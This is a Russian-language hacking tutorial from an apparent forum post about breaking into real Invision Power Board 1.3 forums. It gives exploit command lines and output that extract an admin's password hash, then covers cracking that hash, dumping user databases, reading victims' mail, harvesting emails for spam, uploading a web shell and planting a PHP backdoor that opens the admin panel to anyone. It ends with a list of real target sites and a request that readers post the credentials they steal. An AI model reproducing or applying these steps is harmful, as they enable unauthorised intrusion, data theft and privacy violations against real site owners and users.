h*tp://rapidshare.com/files/89358333/ActivePerl-5.8.8.822-MSWin32-x86-280952.part1.rar
h*tp://rapidshare.com/files/89367262/ActivePerl-5.8.8.822-MSWin32-x86-280952.part2.rar
h*tp://rapidshare.com/files/89373847/ActivePerl-5.8.8.822-MSWin32-x86-280952.part3.rar

. Он нужен для запуска скриптов, написанных на языке Perl. Он является интерпретатором команд написанных в скрипте. Проще говоря, скрипт это набор команд, которые посылаются программе.

В данном примере будет продемонстрировано, как это сделать на примере взлома форума на движке IPB 1.3. Версия относительно стара но таких в нете море, что и радует.
Надеюсь, вы уже скачали ActivePerl. Ну и хорошо. После установки ActivePerl у нас все файлы с расширением *.pl будут открываться через него.

Второе нам понадобится сам exploit . Он валяется тут.
Я буду писать реальный пример взлома сайта на примере hostforum.org.ru. Возможно, после того как я его ломанул эти админы дырочку уже заляпали. Но не беда, идёте в гугл и ищите такой же по его копирайту, для этого просто надо составить запрос на поиск вида: "Powered by Invision Power Board(U) v1.3 Final" (Лучше без кавычек ). А если вам очень понравился этот сайт и нужна его база стучите в личку. Поехали дальше.

Поле того, как вы его скачали, положите в какую нибуть папочку. Создайте для удобства батник (Сохраните под расширением *.bat) и напишите в нём.
Но лучше начинайте осваивать cmd (Если ещё не освоили), он вам ещё пригодится.

Код:

12.pl hostforum.org.ru // 1 0
Pause

Где

12.pl – имя нашего exploit'а
hostforum.org.ru – ну это я думаю понятно
// - директория где расположен сам форум. В данном случае в корневом.
1 – id юзера которого мы хотим узнать хэш. Зайди в раздел админы и посмотри их id. Этот раздел находится внизу -> Статистика форума -> и там будет Администраторы | Пользователи | Модераторы, выбирайте Администраторы, наведите курсор на админа и в переменной showuser будет его id.
0 – приписка данного експлоита, которая выбирает версию форума.
( 0 - IPB 1.* 1 - IPB 2.* (до версии 2.0.4) )
После того как определились с параметрами, запускаем его.

Пример запуска из cmd

Жмёте Win + R.

В командной строке набираем:
C:\путь_к_Perl C:\путь_к_файлу_exploit'а.pl сайт /папка_с_форумом/ 1 0

где:
C:\путь_к_Perl - это путь к файлу интерпретатора, например c:\perl\bin\perl (Если он проинсталирован отдельно то можно просто "perl")

C:\путь_к_файлу_exploit'а.pl - путь к сохраненному вами файлу с кодом сплоита

сайт - сайт форума.

папка_с_форумом - папка на сервере, куда установлен движок форума (смотрите в строке URL броузера)

1 - id юзера, чей хеш мы хотим увести. т.к. нам нужны админские хеши, ставим единицу, потому что первыми на форуме регистрируюца естественно админы (Но не всегда)

0 - версия форума которую мы хотим взломать (0 - IPB 1.*, 1 - IPB 2.*)

Строка в cmd будет выглядеть примерно так:
c:\perl\bin\perl c:\ipb.pl hostforum.org.ru // 1 0

Ждём примерно минутку…..

И о чудо, если эту дырку не заляпали, вы увидите нечто такое:

[~] SERVER : hostforum.org.ru
[~] PATH : //
[~] MEMBER ID : 1
[~] TARGET : 0 - IPB 1.*
[~] SEARCHING PASSWORD ... [ DONE ]

MEMBER ID : 1
PASSWORD : 4ca4fa2580c625262f789960bfe0edeb

4ca4fa2580c625262f789960bfe0edeb – это то что нам и нужно было.

Теперь берём какой либо брутфорс md5 hash и брутим.
Брутить можно разными программами. Это дело вкуса. Вот небольшой список:
http://the-udc.com/rus/
http://rapidshare.com/files/89122993/passwordspro.rar - я пользуюсь этим.
http://www.openwall.com/john/
и т.д.

А лучше посетите какие либо онлайн поисковики md5 hash. В целях избежания засорения статьи лежит тут. И ищем его там.

А ели вы все-таки решили воспользоваться простым брутфорсом, тогда могу посоветовать для удобства одну Perl утилиту. Она тут. + ЭТО
Пользоваться ей очень легко, составляем батник с параметрами:

Код:

1.pl 1.sql 3-4
Pause

Где
1.sql – имя или пут к базе
3-4 – колонки который нам надо выдрать (Можно выдирать только одну, для составления листов hash и mail для спама, или несколько перечисляя их через ”-”)
После чего в папке будет лежать фаил с выдранным.

А если у вас hash не сбрутился советую сходить в раздел Расшифровка хэшей и немного о них самих. Там всегда найдутся добрые люди, которые помогут.

После того как мы его нашли, узнаём логин админа (Там, где и его id).
После чего заходим в админку и сливаем базу. Или шалим на форуме, но помните, нормальный хакер не станет без нужды удалять базу . Помните что этот форум каму-то очень нужен. А вообще не мне вам читать проповеди.

После того как слили базу у вас в руках есть куча чужих мыл, которые можно читать (Ох как люблю я это делать, там иногда мона найти, что нибуть вкусненькое. Например зарегенный на него ак от чего либо ценного). Помимо того после расшифровки предложенных нам хэшей, мона получить сайты, icq, хост и т.п.

Кроме слитой база мы также можем сделать следующее:

1. Залить шелл.

Заходим под админом (как стать админом написано выше : ) )
Далее заходим в "Administration(Администрирование)" жмем "Manage Emoticons(Управление смайлами)" опускаем страницу вниз и видим такую строку "Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)" жмем кнопку "Browse(Обзор)" и выбираем у себя на компе шелл, загружается он в папки в зависимости от версии:
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
где shell.php имя вашего загруженного шелла.

2. Делаем сваю дырку для дальнейшего использования.

Представь что ты сидел и ломал этот форум. А тут пришёл злобный админ и сменил пас а то и хуже, залатал дырку.
Но не тут то было, если вы успели сделать то, что написано ниже.
То что нам надо так это маленько подправить родной код движка. Для этого:

1. найди строчку 392, в ней должно быть следующее:
PHP код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{
$session_validated = 1;
$this_session = $row;
}
её надо заменить на
PHP код:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{

$session_validated = 1;
$this_session = $row;
}
Потом найди строчку 442, в ней будет:

PHP код:
if ($GROUP['g_access_cp'] != 1)
{
do_login("You do not have access to the administrative CP");
}
else
{

//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------

$sess_id = md5( uniqid( microtime() ) );
И замени на
PHP код:

if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)

{

//----------------------------------
// All is good, rejoice as we set a
// session for this user
//----------------------------------

$sess_id = md5( uniqid( microtime() ) );
И последнее
Найди в файле sources/Admin/ad_mysql.php строчку

PHP код:
if ($MEMBER['mgroup'] != $INFO['admin_group'])
{
$ADMIN->error("Sorry, these functions are for the root admin group only");
}
И удали её.

Всё готово, теперь в админку может заходить любой пользователь без прав админа.

Получить админа мона с помощью sql инъекции. (Как делать их, почитаешь в другом разделе.)

Достаточно составить запрос на изменение вашей группы:
UPDATE `ibf_members` SET `mgroup`=4 WHERE `id` =наш_id;
Всё, теперь ваш юзер уже является чистокровным админом.

Удачи!!!

З.Ы.

Тренировочные площадки. (По мере нахождения буду добавлять новые.) :

tomatomobile.ru
forum.aceweb.ru
www.ru-forum.com
forum.ishim.info
www.flame.ws
www.sanktrum.ru
www.cadpointbg.com
sosnogorsk.ru
g orsovet.rikt.ru
forum.nsawt.ru
www.computerland.odessa.ua
www.vumo98.ru

Если у вас получилось, отписывайтесь. (Если не получилось тоже)
Так же, просьба отписываться, вот так.

Код:

http://gorsovet.rikt.ru/forum/
id: 1
hash: 21232f297a57a5a743894a0e4a801fc3
login: admin
password: admin (Если не удалось расшифровать то оставить пустым)

Это на тот случай, чтоб люди не ломали одно и тоже по десять раз.

Если вы поняли сам принцип использования сплоитов И хотите использовать новые, прошу сюда:
http://www.securitylab.ru/
milw0rm.com

Автор:Anvil Оригинал статья